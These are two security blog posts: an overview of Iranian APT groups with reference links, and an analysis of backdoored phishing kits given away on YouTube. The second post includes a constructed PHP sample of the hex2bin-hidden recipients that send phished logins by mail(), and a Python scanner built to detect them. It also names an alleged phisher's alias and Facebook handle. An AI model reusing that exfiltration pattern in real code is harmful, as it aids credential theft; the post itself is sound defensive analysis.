Thursday, January 09, 2020

Iranian APT Group Overview

Today the Birmingham InfraGard Chapter and the Alabama ISSA held a joint meeting featuring a presentation from the Cybersecurity & Infrastructure Security Agency, part of DHS that was formerly known as the NPPD.  I learned of a ton of offerings at the meeting, so I want to start by sharing a link to their CISA Insights Page, where they released earlier this week some guidelines for updating your company's Risk Assessment regarding potential cyber or physical threats from Iranian actors in light of our current political situation, and the tendency of the Iranian regime to lash out with cyber attacks when they can't accomplish what they want with the limited reach of their military.  That Insight was called Increased Geopolitical Tensions and Threats and features ten readiness steps for making sure your org is not a soft target for cyber attacks from Iran. Most of these are things you should be doing anyway, but hey, an Iran threat is possibly a good time to go check those out!  One way of thinking about covering your cyber bases that I really like is actually from the Australian Government, who recommends their "Essential 8" Strategies to Mitigate Cyber Security Incidents.  Start with making sure you have your Essentials covered, but then move on to "Very Good" and "Excellent" steps as your org matures its security practices.

However, we all know that Iran has many Advanced Persistent Threat (APT) Groups, and that there is much more to watching for such activity than patching your systems and telling your users to be aware.  A large org will want to know more about the behaviors of documented Iranian APT Groups. Often these insights include known malware families used by the actor, or what sectors or countries this threat group has historically attacked.

I've seen several documents that share a woefully incomplete list of APT groups from Iran, so I've tried to pull together some helpful links to the main groups below.  In each case, if there is a "MITRE Group #" after the main title, you will find a very robust list of TTPs (Tactics, Techniques, and Procedures) about the group and links to many more reports and resources about the group than I have provided below.  However, I DO like the reports I've listed and think you might want to read them as part of "basic understanding" before following a dozen reports about the same group.  One slight complaint about the MITRE data, and APT Group naming in general, is that there is a great deal of disagreement about which group names are aliases for the same groups, and which may be entirely different groups that just share some tools with one another.  Hey, I'm doing the best I can here, and so is MITRE.  It's tricky!  If you feel I've really got something screwed up, leave a comment!  Let's chat!

It seems most every vendor likes to put their own personal spin on APT Groups.  I have to confess to being a sucker for the CrowdStrike naming conventions (Hi Adam! Hi Dmitri! Hi Shawn!).  They use a different animal to label each APT Group based on the country where the group is hosted.  Their name for Iran is "Kitten" (as in "Persian Kitten", get it?).

While there are several excellent APT disambiguation efforts, my favorite for ease of use is the one run by Florian Roth (Twitter @Cyb3rops) - APT Groups and Operations.  Go to the Iran tab. There are columns for malware sets and links related to each group as well.

If you prefer a much more detailed read of APT Groups, the ThaiCERT has an amazing Threat Actor Encyclopedia! A 275 page omnibus of APT!  However, it is really tricky to pull out, for example, JUST the Iran stuff from it.

For now, I'll organize this by the CrowdStrike Kitten Names. Their set includes at least:

but there are many other companies naming other Iranian APT Groups that may or may not link up with the Kittens.  FireEye is the main user of the numbered APT Groups.  Many of these now have a "Kitten" name as you see above ... APT33, 34, 35, and 39 are all Iranian.  There are several "less well labeled" actors who either don't really behave like traditional APT, or haven't been as widely linked as those above, but are still serious.  A few of those below:
  • Cyber Fighters of Izz Ad-Din Al Qassam - the bank DDOS guys.  
  • DarkHydrus (AKA Lazy Meerkat) - some say is actually also Slayer Kitten, others disagree
  • Gold Lowell (AKA Boss Spider) - these are the SamSam Ransomware guys

If it would be helpful to just have the MITRE links all in one place, here you go!

Thursday, January 02, 2020

Backdoored Phishing Kits are still popular

What did you do for the holidays?  If you're a cybercrime geek you probably took advantage of some of the extra time on your hands to investigate some new phishing sites, right?

Jone Fredrick is the type of Facebook user who is quite open about his criminal activity.  He boasts about his phishing skills by having a Facebook profile picture of someone taking a selfie showing their government issued ID and their credit card!  He claims to live in Blida, Algeria, and probably does.  Over the holidays Jone updated his YouTube channel, "mr azert", with a new Chase Bank phishing kit.  (Phishers don't call this phishing.  They call it "bank scams" or "scam pages.")

In the past two weeks, Jone, who uses the alias "Mr Azert", has uploaded several videos about his new scam pages to his YouTube channel.  Chase, Spotify, Dropbox, Alibaba, and Paypal all have new scam pages courtesy of Mr Azert.  How generous that he just gives them away for free!

After listening to so much bad gangster/scammer rap music, it was nice to hear some Algerian rap while I did my investigation.  Mr Azert confirms this is him by replying to "Tutor Arena421" giving him his email address ( and Facebook address ( jone.fredrick.79).

Of course, we report the offending content to YouTube.  If you ever encounter the same, please use the "Report" function.  The correct flow is to click the "Three Dots" ... then "Report".  Then choose "Spam or misleading" and then the subcategory "Scams / fraud".

In this case, the reason Mr Azert is giving away these phishing kits is that he has backdoored all of the kits.  We'll look at the Chase one first.   There are five separate PHP files that send the various stolen information back to the person using the kit.  

When we look at the actual "Send" command, we notice that the email command says "for each $send" ... but the instructions for the kit have told the kit downloader that they should include their own email address in a certain place, which is "import"ed into this code.  What other address is being used here?

If we scroll up a bit we see that $send is receiving a variable called "token" from the form post that called this PHP code, and then converting it from hex into ASCII with "hex2bin".

The calling code in this case is "myaccount.php" which seems to do some "input validation" but in reality, is also loading the "token" value:

That hex string at the bottom starting with "6665" is decoded in the "hex2bin" call into a pair of email addresses:  and

So, anyone who downloads Mr Azert's kit is going to either create or hack a website, upload and unpack the kit, spam out links to that URL, and then have all of their stolen data go back to Mr Azert in Algeria, who is likely to be better at cashing out the information than someone too lame to make their own phishing kit.
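The backdoor described above is easy to miss by eye because the extra recipients never appear as readable text in the kit: they sit in a hex literal in one file and are only decoded by hex2bin() in another. The script below is an added analysis example, written for this post and not code from the kit or from any vendor; it scans an unpacked kit's PHP sources, decodes hex2bin()/base64_decode() string literals (base64 is included as a generalization of the same trick, not something this particular kit was seen doing), and separates the addresses a user typed in from any that were hidden. The kit files, file names and e-mail addresses in SAMPLE_KIT are constructed placeholders, not the real ones from the Chase kit.

```python
"""Find exfiltration addresses hidden behind hex2bin()/base64_decode()
in PHP phishing-kit sources. Analysis helper for incident responders;
not part of any kit."""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Long hex literals and base64_decode("...") arguments are the usual hiding
# spots; plain-text addresses are matched separately for comparison.
HEX_LITERAL = re.compile(r"""['"]([0-9a-fA-F]{16,})['"]""")
B64_LITERAL = re.compile(r"""base64_decode\(\s*['"]([A-Za-z0-9+/=]{16,})['"]""")
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def decode_hex(literal: str) -> Optional[str]:
    """ASCII text behind a hex literal, or None if it is not valid hex/ASCII."""
    if len(literal) % 2:
        return None
    try:
        return bytes.fromhex(literal).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None


def decode_b64(literal: str) -> Optional[str]:
    """ASCII text behind a base64 literal, or None if it does not decode."""
    try:
        return base64.b64decode(literal, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_recipients(src: str) -> Dict[str, List[str]]:
    """Split addresses in one PHP file into those written in clear text and
    those recoverable only by decoding encoded literals."""
    visible = set(EMAIL.findall(src))
    hidden = set()
    for lit in HEX_LITERAL.findall(src):
        text = decode_hex(lit)
        if text:
            hidden.update(EMAIL.findall(text))
    for lit in B64_LITERAL.findall(src):
        text = decode_b64(lit)
        if text:
            hidden.update(EMAIL.findall(text))
    return {"visible": sorted(visible), "hidden": sorted(hidden - visible)}


def scan_kit(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Aggregate over every file of an unpacked kit. Any 'hidden' address is
    a backdoor indicator: the kit's own user never typed it in."""
    visible, hidden = set(), set()
    for src in files.values():
        found = find_recipients(src)
        visible.update(found["visible"])
        hidden.update(found["hidden"])
    return {"visible": sorted(visible), "hidden": sorted(hidden - visible)}


# Constructed sample kit (placeholder file names and addresses). The hex is
# built at import time so the sample mirrors what a kit author would paste.
_SECRET = "collector-a@example.net,collector-b@example.org"
_HEX = _SECRET.encode().hex()
SAMPLE_KIT = {
    "myaccount.php": f"""<?php
// looks like input validation, but also smuggles the token to send.php
if (!isset($_POST['user'])) {{ exit; }}
$token = "{_HEX}";
""",
    "send.php": """<?php
$my_email = "kit-user@example.com";            // address the downloader fills in
$send = explode(",", hex2bin($_POST['token'])); // hidden extra recipients
foreach ($send as $to) { mail($to, "Login", $message); }
mail($my_email, "Login", $message);
""",
}

if __name__ == "__main__":
    print(scan_kit(SAMPLE_KIT))
```

Run it against a real unpacked kit by reading each .php file into the dict; any address in the "hidden" list that the kit's instructions never asked the user to supply is the exfiltration address to report to the mail provider.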

We're of course reporting all of this to YouTube, Gmail, Yahoo, and Facebook ... 

So how did you spend YOUR holiday?  

Happy New Year everyone!